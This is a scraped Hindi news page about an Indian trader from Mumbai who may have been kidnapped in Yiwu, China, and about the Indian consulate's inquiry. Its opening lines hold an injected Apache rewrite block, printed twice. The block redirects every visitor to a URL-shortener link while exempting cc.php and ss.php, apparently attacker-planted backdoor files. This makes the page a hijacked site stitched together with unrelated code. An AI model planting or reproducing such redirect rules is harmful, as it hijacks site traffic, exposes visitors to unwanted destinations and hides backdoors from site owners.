
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 607
Previous Nextनई दिल्ली। झेजियांग से एक भारतीय नागरिक तबरेज अकबराली बाना के अपहरण की आशंका है। तबरेज मुंबई के रहने वाले हैं। शंघाई में भारतीय अधिकारियों ने चीन सरकार से उनके बारे में जानकारी मांगी है। इसके लिए शंघाई स्थित भारतीय वाणिज्य दूतावास ने चीनी विदेश मंत्रालय के स्थानीय कार्यालय में नोट वर्बेल भी दाखिल किया है।
राजनयिक सूत्रों ने बताया कि तबरेज कुछ दिनों पहले चीन में यीवू स्थित दुनिया के सबसे बड़े कमोडिटी मार्केट से लापता हो गए थे। आशंका है कि कारोबारी विवाद में स्थानीय उद्यमियों ने उनका अपहरण कर लिया है। कुछ दिन पहले स्थानीय उद्यमियों से खतरे की बाबत शिकायत करने वह यीवू के पुलिस स्टेशन भी गए थे। वह तभी से लापता हैं। पारिवारिक सूत्रों का कहना है कि स्थानीय व्यापारियों ने शायद गलत पहचान के कारण उनका अपहरण कर लिया है। मालूम हो कि सैकड़ों भारतीय व्यापारी खरीदारी के लिए यीवू जाते हैं।